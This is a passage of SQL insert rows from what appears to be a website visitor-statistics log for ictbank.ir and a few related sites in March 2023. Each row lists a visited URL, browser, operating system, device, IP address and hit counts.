(30269,'2023-03-19','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','36.40.66.38','000',0,1,0),
(30270,'2023-03-19','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,5,0),
(30271,'2023-03-19','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','138.199.60.183','000',0,6,0),
(30272,'2023-03-19','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','78.0.0.0','desktop','Unknown','','185.119.81.109','000',0,4,0),
(30273,'2023-03-19','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','164.90.132.69','000',0,2,0),
(30274,'2023-03-19','https://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','213.32.122.82','000',0,1,0),
(30275,'2023-03-19','https://ictbank.ir/blog','Chrome','Windows','95.0.0.0','desktop','Unknown','','146.190.100.64','000',0,2,0),
(30276,'2023-03-19','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.43','000',0,4,0),
(30277,'2023-03-19','https://nikoo-academy.com/masoudnikoofar','Chrome','Windows','110.0.0.0','desktop','Unknown','','5.160.95.179','000',0,9,0),
(30278,'2023-03-19','http://45.92.94.221:80/c/','Unknown','Linux','Unknown','','Unknown','','146.70.112.188','000',0,5,0),
(30279,'2023-03-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(30280,'2023-03-19','https://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','136.169.243.74','000',0,4,0),
(30281,'2023-03-19','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.219.250.31','000',0,2,0),
(30282,'2023-03-19','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','130.255.166.98','000',0,1,0),
(30283,'2023-03-19','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','130.255.166.69','000',0,1,0),
(30284,'2023-03-19','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','130.255.166.115','000',0,1,0),
(30285,'2023-03-19','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','130.255.166.97','000',0,1,0),
(30286,'2023-03-19','https://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','89.45.4.7','000',0,1,0),
(30287,'2023-03-19','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','108.167.156.27','000',0,1,0),
(30288,'2023-03-19','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','93.113.111.100','000',0,1,0),
(30289,'2023-03-19','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','52.162.218.19','000',0,2,0),
(30290,'2023-03-19','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.81','000',0,4,0),
(30291,'2023-03-19','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(30292,'2023-03-19','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','216.226.149.181','000',0,1,0),
(30293,'2023-03-20','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30294,'2023-03-20','https://ictbank.ir/blog','Firefox','Windows','117.0','desktop','Unknown','','195.146.37.212','000',0,1,0),
(30295,'2023-03-20','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.200.51.183','000',0,1,0),
(30296,'2023-03-20','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','185.125.19.6','000',0,2,0),
(30297,'2023-03-20','https://ictbank.ir/blog','Chrome','Windows','87.0.0.0','desktop','Unknown','','92.53.96.137','000',0,2,0),
(30298,'2023-03-20','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','103.127.187.231','000',0,127,0),
(30299,'2023-03-20','https://ictbank.ir/blog','Firefox','Windows','62.0','desktop','Unknown','','91.237.192.151','000',0,2,0),
(30300,'2023-03-20','https://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','136.169.243.74','000',0,4,0),
(30301,'2023-03-20','https://ictbank.ir/blog','Firefox','Windows','62.0','desktop','Unknown','','5.178.80.157','000',0,2,0),
(30302,'2023-03-20','https://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','128.90.21.26','000',0,21,0),
(30303,'2023-03-20','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(30304,'2023-03-20','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,1,0),
(30305,'2023-03-20','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.92.27.198','000',0,1,0),
(30306,'2023-03-20','https://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','142.93.81.12','000',0,1,0),
(30307,'2023-03-20','https://ictbank.ir/blog','Safari','iOS','14.0.0','mobile:smart','iPhone','','5.181.254.56','000',0,1,0),
(30308,'2023-03-20','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.242','000',0,1,0),
(30309,'2023-03-20','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(30310,'2023-03-20','https://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.121','000',0,5,0),
(30311,'2023-03-20','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.111','000',0,1,0),
(30312,'2023-03-20','https://neginghavami.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','65.21.158.22','000',0,12,0),
(30313,'2023-03-20','https://ictbank.ir/blog','Chrome','Windows','111.0.0.0','desktop','Unknown','','91.107.157.141','000',0,2,0),
(30314,'2023-03-20','https://neginghavami.ir','Chrome','OS X','35.0.0.0','desktop','Macintosh','','83.166.247.13','000',0,1,0),
(30315,'2023-03-20','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.186','000',0,2,0),
(30316,'2023-03-20','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.235.49.155','000',0,1,0),
(30317,'2023-03-20','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','82.165.83.135','000',0,1,0),
(30318,'2023-03-20','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.60','000',0,2,0),
(30319,'2023-03-20','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','128.14.226.202','000',0,3,0),
(30320,'2023-03-20','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.201.50.50','000',0,2,0),
(30321,'2023-03-20','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','104.131.6.106','000',0,2,0),
(30322,'2023-03-20','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,3,0),
(30323,'2023-03-20','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.13','000',0,3,0),
(30324,'2023-03-21','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(30325,'2023-03-21','https://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,5,0),
(30326,'2023-03-21','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.235.76.129','000',0,1,0),
(30327,'2023-03-21','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','49.0.0.0','desktop','Unknown','','185.119.81.107','000',0,8,0),
(30328,'2023-03-21','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','70.0.0.0','desktop','Unknown','','175.134.99.56','000',0,3,0),
(30329,'2023-03-21','https://ictbank.ir/blog','Chrome','Windows','50.0.0.0','desktop','Unknown','','52.90.230.149','000',0,2,0),
(30330,'2023-03-21','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,2,0),
(30331,'2023-03-21','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(30332,'2023-03-21','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.0.249.226','000',0,1,0),
(30333,'2023-03-21','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(30334,'2023-03-21','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','23.90.160.146','000',0,1,0),
(30335,'2023-03-21','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(30336,'2023-03-21','https://ictbank.ir/blog','Chrome','Linux','5.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(30337,'2023-03-21','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(30338,'2023-03-21','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,1,0),
(30339,'2023-03-21','https://mail.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.141.42','000',0,2,0),
(30340,'2023-03-21','https://ictbank.ir/blog','Firefox','Linux','52.0','desktop','Unknown','','3.12.71.221','000',0,1,0),
(30341,'2023-03-21','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','2.180.36.236','000',0,1,0),
(30342,'2023-03-21','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','43.251.255.108','000',0,1,0),
(30343,'2023-03-21','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','43.248.55.250','000',0,1,0),
(30344,'2023-03-21','https://ictbank.ir/blog','Firefox','Ubuntu','107.0','desktop','Unknown','','139.91.70.45','000',0,2,0),
(30345,'2023-03-21','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.220.244.108','000',0,2,0),
(30346,'2023-03-21','https://45.92.94.221:443/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','3.239.89.57','000',0,6,0),
(30347,'2023-03-21','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.127.135.254','000',0,1,0),
(30348,'2023-03-21','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,1,0),
(30349,'2023-03-21','https://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','84.17.43.195','000',0,4,0),
(30350,'2023-03-21','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.26.194.244','000',0,1,0),
(30351,'2023-03-21','http://ictbank.ir','Unknown','Windows','Unknown','desktop','Unknown','','77.68.20.217','000',0,1,0),
(30352,'2023-03-21','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','188.165.157.120','000',0,2,0),
(30353,'2023-03-21','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,1,0),
(30354,'2023-03-21','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','200.123.30.236','000',0,1,0),
(30355,'2023-03-21','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30356,'2023-03-21','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,2,0),
(30357,'2023-03-21','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(30358,'2023-03-22','https://ictbank.ir/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','199.127.56.236','000',0,1,0),
(30359,'2023-03-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,5,0),
(30360,'2023-03-22','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','107.150.96.133','000',0,3,0),
(30361,'2023-03-22','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','188.166.224.48','000',0,2,0),
(30362,'2023-03-22','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(30363,'2023-03-22','https://45.92.94.221/blog','Chrome','Linux','44.0.0.0','desktop','Unknown','','104.248.241.179','000',0,3,0),
(30364,'2023-03-22','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.71','000',0,2,0),
(30365,'2023-03-22','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','94.158.245.23','000',0,1,0),
(30366,'2023-03-22','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','36.40.72.66','000',0,1,0),
(30367,'2023-03-22','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.13.247','000',0,4,0),
(30368,'2023-03-22','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','103.179.217.129','000',0,1,0),
(30369,'2023-03-22','https://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','94.130.167.248','000',0,1,0),
(30370,'2023-03-22','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','136.169.243.74','000',0,8,0),
(30371,'2023-03-22','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.140','000',0,12,0),
(30372,'2023-03-22','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(30373,'2023-03-22','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','54.174.150.218','000',0,1,0),
(30374,'2023-03-22','https://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.17','000',0,3,0),
(30375,'2023-03-22','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(30376,'2023-03-22','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','124.5.139.143','000',0,8,0),
(30377,'2023-03-22','https://ictbank.ir/dashtpodcast/wp-content/uploads/2020/06/E10_image.jpg','Huawei Browser','Android','11.0.0.0','mobile:smart','P40 Lite','','95.162.236.60','000',0,1,0),
(30378,'2023-03-22','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(30379,'2023-03-22','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','27.115.124.45','000',0,1,0),
(30380,'2023-03-22','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.212.120.236','000',0,1,0),
(30381,'2023-03-22','https://45.92.94.221/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.76','000',0,2,0),
(30382,'2023-03-22','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.96','000',0,1,0),
(30383,'2023-03-22','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.198.78.255','000',0,1,0),
(30384,'2023-03-22','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,4,0),
(30385,'2023-03-22','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.110','000',0,1,0),
(30386,'2023-03-22','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','203.124.41.171','000',0,1,0),
(30387,'2023-03-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(30388,'2023-03-22','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','5.188.62.76','000',0,3,0),
(30389,'2023-03-22','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','50.116.8.96','000',0,1,0),
(30390,'2023-03-22','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.8','000',0,1,0),
(30391,'2023-03-22','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,2,0),
(30392,'2023-03-22','https://ictbank.ir/blog','Chrome','Linux','63.0.0.0','desktop','Unknown','','136.143.176.64','000',0,3,0),
(30393,'2023-03-22','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','89.187.163.218','000',0,3,0),
(30394,'2023-03-23','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','111.90.145.118','000',0,6,0),
(30395,'2023-03-23','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','13.87.75.175','000',0,1,0),
(30396,'2023-03-23','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,2,0),
(30397,'2023-03-23','https://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.88','000',0,1,0),
(30398,'2023-03-23','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,8,0),
(30399,'2023-03-23','https://ictbank.ir/blog','Chrome','OS X','76.0.0.0','desktop','Macintosh','','8.218.134.56','000',0,1,0),
(30400,'2023-03-23','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','79.0.0.0','desktop','Unknown','','185.119.81.107','000',0,4,0),
(30401,'2023-03-23','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(30402,'2023-03-23','https://design-arena.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','162.55.52.117','000',0,10,0),
(30403,'2023-03-23','https://ictbank.ir/blog','Chrome','Android','81.0.0.0','mobile:smart','Nexus 5','','124.220.161.119','000',0,2,0),
(30404,'2023-03-23','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','134.209.164.80','000',0,1,0),
(30405,'2023-03-23','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.13','000',0,3,0),
(30406,'2023-03-23','https://ictbank.ir/blog','Chrome','OS X','83.0.0.0','desktop','Macintosh','','54.144.231.154','000',0,3,0),
(30407,'2023-03-23','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.247.178.167','000',0,1,0),
(30408,'2023-03-23','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','212.47.221.241','000',0,1,0),
(30409,'2023-03-23','https://ictbank.ir/blog','Chrome','OS X','53.0.0.0','desktop','Macintosh','','85.12.219.141','000',0,1,0),
(30410,'2023-03-23','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30411,'2023-03-23','https://ictbank.ir/blog','Opera','Windows','93.0.0.0','desktop','Unknown','','195.201.132.162','000',0,7,0),
(30412,'2023-03-23','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(30413,'2023-03-23','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,3,0),
(30414,'2023-03-23','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','159.65.152.123','000',0,1,0),
(30415,'2023-03-23','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','205.196.223.27','000',0,1,0),
(30416,'2023-03-23','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(30417,'2023-03-23','https://ictbank.ir/blog','Chrome','OS X','83.0.0.0','desktop','Macintosh','','54.91.194.75','000',0,3,0),
(30418,'2023-03-23','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.211.245.122','000',0,2,0),
(30419,'2023-03-23','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(30420,'2023-03-23','https://ictbank.ir/blog','Chrome','OS X','76.0.0.0','desktop','Macintosh','','47.242.5.48','000',0,2,0),
(30421,'2023-03-23','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.117.129.228','000',0,1,0),
(30422,'2023-03-23','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(30423,'2023-03-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','62.171.175.57','000',0,1,0),
(30424,'2023-03-23','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','178.128.126.187','000',0,5,0),
(30425,'2023-03-23','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.241.127.128','000',0,1,0),
(30426,'2023-03-23','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','165.227.104.146','000',0,2,0),
(30427,'2023-03-23','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','93.174.95.106','000',0,3,0),
(30428,'2023-03-23','https://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','GALAXY S SC-02B','','39.110.218.101','000',0,2,0),
(30429,'2023-03-23','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','139.59.77.216','000',0,5,0),
(30430,'2023-03-23','https://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','GALAXY S SC-02B','','133.242.140.127','000',0,2,0),
(30431,'2023-03-23','https://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','GALAXY S SC-02B','','133.242.174.119','000',0,2,0),
(30432,'2023-03-23','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.165','000',0,1,0),
(30433,'2023-03-24','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','66.42.53.153','000',0,12,0),
(30434,'2023-03-24','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','95.211.87.209','000',0,1,0),
(30435,'2023-03-24','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','185.219.42.99','000',0,1,0),
(30436,'2023-03-24','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','89.208.154.10','000',0,1,0),
(30437,'2023-03-24','https://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(30438,'2023-03-24','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','80.0.0.0','desktop','Unknown','','185.119.81.102','000',0,4,0),
(30439,'2023-03-24','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(30440,'2023-03-24','https://ictbank.ir/blog','Firefox','Windows','60.0','desktop','Unknown','','37.46.133.220','000',0,1,0),
(30441,'2023-03-24','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.121','000',0,2,0),
(30442,'2023-03-24','https://l.instagram.com/','Instagram','Android','274.0.0.0.0','mobile:smart','Galaxy A52s 5G','','5.78.45.91','000',0,1,0),
(30443,'2023-03-24','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','208.109.34.70','000',0,1,0),
(30444,'2023-03-24','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.142.141.105','000',0,1,0),
(30445,'2023-03-24','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','88.80.190.5','000',0,1,0),
(30446,'2023-03-24','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.25','000',0,20,0),
(30447,'2023-03-24','https://ictbank.ir/blog','Safari','OS X','9.0.0','desktop','Macintosh','','138.199.21.53','000',0,1,0),
(30448,'2023-03-24','https://www.neginghavami.ir/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.76.138','000',0,1,0),
(30449,'2023-03-24','https://www.neginghavami.ir/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.74.59','000',0,1,0),
(30450,'2023-03-24','https://www.neginghavami.ir/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.89.193.162','000',0,1,0),
(30451,'2023-03-24','https://www.neginghavami.ir/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.25.10','000',0,1,0),
(30452,'2023-03-24','https://www.neginghavami.ir/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.89.193.239','000',0,1,0),
(30453,'2023-03-24','https://www.neginghavami.ir/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.14.232','000',0,1,0),
(30454,'2023-03-24','https://neginghavami.ir/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.94.159','000',0,2,0),
(30455,'2023-03-24','https://neginghavami.ir/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.94.28','000',0,2,0),
(30456,'2023-03-24','https://neginghavami.ir/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.6.178','000',0,1,0),
(30457,'2023-03-24','https://neginghavami.ir/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.13.32','000',0,1,0),
(30458,'2023-03-24','https://neginghavami.ir/blog','Opera','Windows','93.0.0.0','desktop','Unknown','','65.21.158.22','000',0,5,0),
(30459,'2023-03-24','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,5,0),
(30460,'2023-03-24','https://ictbank.ir/blog','Vivaldi','Windows','5.0.0.0','desktop','Unknown','','37.46.113.172','000',0,7,0),
(30461,'2023-03-24','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.241.133','000',0,4,0),
(30462,'2023-03-24','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.164.244','000',0,2,0),
(30463,'2023-03-24','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','103.14.35.145','000',0,2,0),
(30464,'2023-03-24','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.237.7.175','000',0,1,0),
(30465,'2023-03-24','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(30466,'2023-03-24','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(30467,'2023-03-24','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','92.204.129.45','000',0,1,0),
(30468,'2023-03-24','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(30469,'2023-03-24','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(30470,'2023-03-24','https://design-arena.ir/blog','Opera','OS X','94.0.0.0','desktop','Macintosh','','162.55.52.117','000',0,3,0),
(30471,'2023-03-24','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30472,'2023-03-24','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','92.204.212.202','000',0,1,0),
(30473,'2023-03-24','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','154.53.48.149','000',0,6,0),
(30474,'2023-03-24','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','89.187.163.216','000',0,2,0),
(30475,'2023-03-24','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.220.71.102','000',0,2,0),
(30476,'2023-03-24','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','109.74.200.57','000',0,1,0),
(30477,'2023-03-24','https://ictbank.ir/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','31.13.127.9','000',0,1,0),
(30478,'2023-03-24','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.176.68','000',0,2,0),
(30479,'2023-03-24','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','89.187.163.203','000',0,3,0),
(30480,'2023-03-24','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.127.135.254','000',0,1,0),
(30481,'2023-03-24','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(30482,'2023-03-24','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(30483,'2023-03-24','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.85.233.201','000',0,1,0),
(30484,'2023-03-24','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(30485,'2023-03-25','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','156.146.56.133','000',0,3,0),
(30486,'2023-03-25','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,1,0),
